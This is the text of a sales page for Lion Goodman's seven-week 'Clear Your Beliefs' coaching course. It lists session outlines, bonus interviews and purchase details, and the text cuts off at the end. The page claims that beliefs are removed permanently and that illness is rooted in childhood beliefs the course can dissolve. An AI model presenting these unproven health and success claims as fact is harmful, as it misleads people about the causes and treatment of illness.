<strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The 